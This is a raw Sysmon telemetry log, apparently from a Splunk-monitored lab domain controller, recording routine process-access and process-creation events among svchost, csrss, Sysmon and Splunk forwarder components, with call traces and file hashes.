13:29:16.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.576{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.576{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-472C-6000-FC04-000000009A01}228C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.576{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-472C-6000-FC04-000000009A01}228C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.577{08A6967A-472C-6000-FC04-000000009A01}228C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.045{08A6967A-472B-6000-FB04-000000009A01}34124800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.623{08A6967A-472D-6000-FD04-000000009A01}473232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-472D-6000-FD04-000000009A01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-472D-6000-FD04-000000009A01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.482{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-472D-6000-FD04-000000009A01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:17.483{08A6967A-472D-6000-FD04-000000009A01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 